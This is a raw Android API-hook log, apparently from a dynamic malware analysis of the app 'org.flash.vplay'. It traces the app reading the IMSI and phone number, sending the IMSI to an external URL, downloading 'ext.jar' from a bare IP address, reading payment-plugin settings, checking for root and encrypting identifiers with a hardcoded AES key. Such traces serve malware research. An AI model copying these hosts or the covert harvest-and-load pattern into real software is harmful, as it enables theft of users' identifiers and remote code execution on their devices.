D/S4URC   ( 2475): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.net.HttpURLConnection]
D/S4URC   ( 2475): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.okhttp.internal.http.HttpURLConnectionImpl]
D/S4URC   ( 2475): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.net.Socket]
D/S4URC   ( 2475): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.telephony.TelephonyManager]
D/S4URC   ( 2475): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.os.Debug]
D/S4URC   ( 2475): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.hardware.SensorManager]
D/S4URC   ( 2475): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.content.res.ResourcesKey]
D/S4URC   ( 2475): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.ResourcesManager]
D/S4URC   ( 2475): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/app/org.flash.vplay-1/base.apk]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/cache]
D/S4URC   ( 2475): [SDK] [java.io.File] [mkdirs] [FilePath][String] [/data/data/org.flash.vplay/cache]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/cache]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/appcon.xml]
D/S4URC   ( 2475): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/appcon.xml.bak]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/appcon.xml]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][appcon.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/appcon.xml.bak]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/appcon.xml]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/appcon.xml]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][appcon.xml] [MODE][MODE_PRIVATE] [Method][getBoolean] [Boolean][appinit] [Return][false]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][appcon.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][appImsi] [Return][]
D/S4URC   ( 2475): [SDK] [android.telephony.TelephonyManager] [getSubscriberId]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][appcon.xml] [MODE][MODE_PRIVATE] [Method][getInt] [Int][jarDate] [Return][-1]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/files]
D/S4URC   ( 2475): [SDK] [java.io.File] [mkdirs] [FilePath][String] [/data/data/org.flash.vplay/files]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/files]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/files]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/files/jarData.jar]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/files]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/files]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/files]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/event_flag.xml]
D/S4URC   ( 2475): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/event_flag.xml.bak]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/event_flag.xml]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][event_flag.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/event_flag.xml.bak]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/event_flag.xml]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/event_flag.xml]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][event_flag.xml] [MODE][MODE_PRIVATE] [Method][getIong] [Iong][FLAG_DOWNLOAD] [Return][-1]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/files/ext.jar]
D/S4URC   ( 2475): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.OpenSSLSocketFactoryImpl]
D/S4URC   ( 2475): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.OpenSSLRandom]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/files/ext.jar]
D/S4URC   ( 2475): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.KeyManagerFactoryImpl]
D/S4URC   ( 2475): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.bouncycastle.jcajce.provider.keystore.bc.BcKeyStoreSpi$Std]
D/S4URC   ( 2475): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.TrustManagerFactoryImpl]
D/S4URC   ( 2475): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.TrustedCertificateKeyStoreSpi]
D/S4URC   ( 2475): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.bouncycastle.jce.provider.PKIXCertPathValidatorSpi]
D/S4URC   ( 2475): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/misc/keychain/pins]
D/S4URC   ( 2475): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.okhttp.HttpHandler]
D/S4URC   ( 2475): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.OpenSSLContextImpl]
D/S4URC   ( 2475): [SDK] [java.net] [HttpURLConnection] [URL][String] [http://www.soimsi.com/imsi.html?phone=452050246825826]
D/S4URC   ( 2475): [SDK] [java.net] [HttpURLConnection] [URL][String] [http://119.29.19.163:8080/app/ext.jar]
D/S4URC   ( 2475): [SDK] [android.app.ApplicationPackageManager] [getApplicationInfo] [FindApplicationName][String] [org.flash.vplay]
D/S4URC   ( 2475): [SDK] [android.app.ApplicationPackageManager] [getPackageInfo] [FindPackageName][String] [org.flash.vplay]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/app_txsdklog]
D/S4URC   ( 2475): [SDK] [java.io.File] [mkdir] [FilePath][String] [/data/data/org.flash.vplay/app_txsdklog]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/app_txsdklog]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/app_txsdklog/raw]
D/S4URC   ( 2475): [SDK] [java.io.File] [mkdirs] [FilePath][String] [/data/data/org.flash.vplay/app_txsdklog/raw]
D/S4URC   ( 2475): [SDK] [android.telephony.TelephonyManager] [getSubscriberId]
D/S4URC   ( 2475): [SDK] [android.telephony.TelephonyManager] [getLine1Number]
D/S4URC   ( 2475): [SDK] [java.lang.Runtime] [loadLibrary] [SoPath][String] [tencentloc]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/app/org.flash.vplay-1/lib/arm]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/app/org.flash.vplay-1/lib/arm/libtencentloc.so]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper] [registerReceiver][IntentFilter][android.net.conn.CONNECTIVITY_CHANGE,
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper] [registerReceiver][IntentFilter][android.net.wifi.WIFI_STATE_CHANGED,android.net.wifi.SCAN_RESULTS,
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/pay_xml.xml]
D/S4URC   ( 2475): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/pay_xml.xml.bak]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/pay_xml.xml]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][pay_xml.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0]
D/S4URC   ( 2475): [SDK] [android.os.Environment] [getExternalStorageDirectory] [DirectoryPath][String] [/storage/sdcard0]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][pay_xml.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/pay_xml.xml.bak]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/pay_xml.xml]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/pay_xml.xml]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][pay_xml.xml] [MODE][MODE_PRIVATE] [Method][getBoolean] [Boolean][pluginState] [Return][true]
D/S4URC   ( 2475): [SDK] [android.app.ApplicationPackageManager] [getApplicationInfo] [FindApplicationName][String] [org.flash.vplay]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/zwkj.xml]
D/S4URC   ( 2475): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/zwkj.xml.bak]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/zwkj.xml]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][zwkj.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/zwkj.xml.bak]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/zwkj.xml]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/zwkj.xml]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][zwkj.xml] [MODE][MODE_PRIVATE] [Method][putString] [Key][id] [Value][65066c415c0fd231]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/zwkj.xml]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/zwkj.xml]
D/S4URC   ( 2475): [SDK] [java.io.File] [getParent] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/zwkj.xml]
D/S4URC   ( 2475): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs]
D/S4URC   ( 2475): [SDK] [java.io.File] [mkdir] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/zwkj.xml]
D/S4URC   ( 2475): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/zwkj.xml.bak]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][zwkj.xml] [MODE][MODE_PRIVATE] [Method][commit]
D/S4URC   ( 2475):  [Method][getString] [String][jn] [Return][]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/files]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/files]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/files]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][zwkj.xml] [MODE][MODE_PRIVATE] [Method][putString] [Key][jn] [Value][ct.jar]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/zwkj.xml]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/zwkj.xml.bak]
D/S4URC   ( 2475): [SDK] [java.io.File] [renameTo] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/zwkj.xml] [DesFile][/data/data/org.flash.vplay/shared_prefs/zwkj.xml.bak]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/zwkj.xml]
D/S4URC   ( 2475): [SDK] [android.app.Activity][onCrate] [Class][ComponentInfo{org.flash.vplay/com.videoclient.player.LogoActivity}]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/zwkj.xml]
D/S4URC   ( 2475): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/zwkj.xml.bak]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/files]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/files]
D/S4URC   ( 2475): [SDK] [android.content.Intent] [Constructor] [IntentInfo][String] [O_ACTION_PUSH_START]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][pay_xml.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][pay_xml.xml] [MODE][MODE_PRIVATE] [Method][getInt] [Int][pay_video] [Return][-1]
D/S4URC   ( 2475): [SDK] [java.io.File] [Constructor] [FilePath][String] [/storage/sdcard0]
D/S4URC   ( 2475): [SDK] [java.io.File] [Constructor] [FilePath][String] [/storage/sdcard1]
D/S4URC   ( 2475): [SDK] [java.io.File] [Constructor] [FilePath][String] [/storage/usb2host]
D/S4URC   ( 2475): [SDK] [java.io.File] [Constructor] [FilePath][String] [/storage/usb3device]
D/S4URC   ( 2475): [SDK] [java.io.File] [Constructor] [FilePath][String] [/storage/usb3host]
D/S4URC   ( 2475): [SDK] [android.os.Environment] [getExternalStorageState] [ExternalStorageState][String] [mounted]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0]
D/S4URC   ( 2475): [SDK] [android.os.Environment] [getExternalStorageDirectory] [DirectoryPath][String] [/storage/sdcard0]
D/S4URC   ( 2475): [SDK] [java.io.File] [Constructor] [FilePath][String] [/storage/sdcard0/_b_sdk.log]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/storage/sdcard0/_b_sdk.log]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/__Baidu_Stat_SDK_SendRem.xml]
D/S4URC   ( 2475): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/__Baidu_Stat_SDK_SendRem.xml.bak]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/__Baidu_Stat_SDK_SendRem.xml]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][__Baidu_Stat_SDK_SendRem.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/__Baidu_Stat_SDK_SendRem.xml.bak]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/__Baidu_Stat_SDK_SendRem.xml]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/__Baidu_Stat_SDK_SendRem.xml]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][__Baidu_Stat_SDK_SendRem.xml] [MODE][MODE_PRIVATE] [Method][putString] [Key][setchannelwithcodevalue] [Value][]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/__Baidu_Stat_SDK_SendRem.xml]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/__Baidu_Stat_SDK_SendRem.xml]
D/S4URC   ( 2475): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/__Baidu_Stat_SDK_SendRem.xml.bak]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][__Baidu_Stat_SDK_SendRem.xml] [MODE][MODE_PRIVATE] [Method][commit]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][__Baidu_Stat_SDK_SendRem.xml] [MODE][MODE_PRIVATE] [Method][putBoolean] [Key][setchannelwithcode] [Value][false]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/__Baidu_Stat_SDK_SendRem.xml]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/__Baidu_Stat_SDK_SendRem.xml.bak]
D/S4URC   ( 2475): [SDK] [java.io.File] [renameTo] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/__Baidu_Stat_SDK_SendRem.xml] [DesFile][/data/data/org.flash.vplay/shared_prefs/__Baidu_Stat_SDK_SendRem.xml.bak]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/__Baidu_Stat_SDK_SendRem.xml]
D/S4URC   ( 2475): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/__Baidu_Stat_SDK_SendRem.xml.bak]
D/S4URC   ( 2475): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.videoclient.player.LogoActivity]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][__Baidu_Stat_SDK_SendRem.xml] [MODE][MODE_PRIVATE] [Method][putBoolean] [Key][exceptionanalysisflag] [Value][true]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/__Baidu_Stat_SDK_SendRem.xml]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/__Baidu_Stat_SDK_SendRem.xml.bak]
D/S4URC   ( 2475): [SDK] [java.io.File] [renameTo] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/__Baidu_Stat_SDK_SendRem.xml] [DesFile][/data/data/org.flash.vplay/shared_prefs/__Baidu_Stat_SDK_SendRem.xml.bak]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/__Baidu_Stat_SDK_SendRem.xml]
D/S4URC   ( 2475): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/__Baidu_Stat_SDK_SendRem.xml.bak]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][__Baidu_Stat_SDK_SendRem.xml] [MODE][MODE_PRIVATE] [Method][putInt] [Key][sendLogtype] [Value][0]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/__Baidu_Stat_SDK_SendRem.xml]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/__Baidu_Stat_SDK_SendRem.xml.bak]
D/S4URC   ( 2475): [SDK] [java.io.File] [renameTo] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/__Baidu_Stat_SDK_SendRem.xml] [DesFile][/data/data/org.flash.vplay/shared_prefs/__Baidu_Stat_SDK_SendRem.xml.bak]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/__Baidu_Stat_SDK_SendRem.xml]
D/S4URC   ( 2475): [SDK] [android.app.ApplicationPackageManager] [getApplicationInfo] [FindApplicationName][String] [org.flash.vplay]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/__Baidu_Stat_SDK_SendRem.xml]
D/S4URC   ( 2475): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/__Baidu_Stat_SDK_SendRem.xml.bak]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][__Baidu_Stat_SDK_SendRem.xml] [MODE][MODE_PRIVATE] [Method][putBoolean] [Key][onlywifi] [Value][false]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/__Baidu_Stat_SDK_SendRem.xml]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/__Baidu_Stat_SDK_SendRem.xml.bak]
D/S4URC   ( 2475): [SDK] [java.io.File] [renameTo] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/__Baidu_Stat_SDK_SendRem.xml] [DesFile][/data/data/org.flash.vplay/shared_prefs/__Baidu_Stat_SDK_SendRem.xml.bak]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/__Baidu_Stat_SDK_SendRem.xml]
D/S4URC   ( 2475): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/__Baidu_Stat_SDK_SendRem.xml.bak]
D/S4URC   ( 2475): [SDK] [android.app.ApplicationPackageManager] [getApplicationInfo] [FindApplicationName][String] [org.flash.vplay]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/files]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/files]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/files/__local_stat_cache.json]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/files]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/files]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/files/__local_last_session.json]
D/S4URC   ( 2475):  [Method][getBoolean] [Boolean][mtjtv] [Return][false]
D/S4URC   ( 2475): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.videoclient.player.LogoActivity]
D/S4URC   ( 2475): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.OpenSSLCipher$AES$ECB$PKCS5Padding]
D/S4URC   ( 2475): [SDK] [javax.crypto.spec.SecretKeySpec][Constructor] [KEY][30212102dicudiab][type][AES][javax.crypto.Cipher][getInstance] [Cipher][AES/ECB/PKCS5Padding] [javax.crypto.Cipher][doFinal] [Data][7cdd90ebfc1f] [Return][jQQmHzDHijz7crYXiVRPiw==]
D/S4URC   ( 2475): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.bouncycastle.jcajce.provider.symmetric.AES$ECB]
D/S4URC   ( 2475): [SDK] [javax.crypto.spec.SecretKeySpec][Constructor] [KEY][30212102dicudiab][type][AES][javax.crypto.Cipher][getInstance] [Cipher][AES] [javax.crypto.Cipher][doFinal] [Data][jQQmHzDHijz7crYXiVRPiw==] [Return][7cdd90ebfc1f]
D/S4URC   ( 2475):  [Method][getString] [String][mtjsdkmacss] [Return][null]
D/S4URC   ( 2475): [SDK] [javax.crypto.spec.SecretKeySpec][Constructor] [KEY][30212102dicudiab][type][AES][javax.crypto.Cipher][getInstance] [Cipher][AES/ECB/PKCS5Padding] [javax.crypto.Cipher][doFinal] [Data][7cdd90ebfc1f] [Return][jQQmHzDHijz7crYXiVRPiw==]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][__Baidu_Stat_SDK_SendRem.xml] [MODE][MODE_PRIVATE] [Method][putString] [Key][mtjsdkmacss] [Value][jQQmHzDHijz7crYXiVRPiw==]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/__Baidu_Stat_SDK_SendRem.xml]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/__Baidu_Stat_SDK_SendRem.xml.bak]
D/S4URC   ( 2475): [SDK] [java.io.File] [renameTo] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/__Baidu_Stat_SDK_SendRem.xml] [DesFile][/data/data/org.flash.vplay/shared_prefs/__Baidu_Stat_SDK_SendRem.xml.bak]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/__Baidu_Stat_SDK_SendRem.xml]
D/S4URC   ( 2475): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/__Baidu_Stat_SDK_SendRem.xml.bak]
D/S4URC   ( 2475):  [Method][getString] [String][cuidsec] [Return][null]
D/S4URC   ( 2475): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.OpenSSLMessageDigestJDK$MD5]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/aa.xml]
D/S4URC   ( 2475): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/aa.xml.bak]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/aa.xml]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][aa.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/aa.xml.bak]
D/S4URC   ( 2475): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/aa.xml]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/org.flash.vplay/shared_prefs/aa.xml]
D/S4URC   ( 2475): [SDK] [android.content.ContentResolver] [registerContentObserver] [URL][String] [content://settings/system/enable_stylus_gestures]
D/S4URC   ( 2475): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][aa.xml] [MODE][MODE_PRIVATE] [Method][getBoolean] [Boolean][root] [Return][false]
D/S4URC   ( 2475): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0]
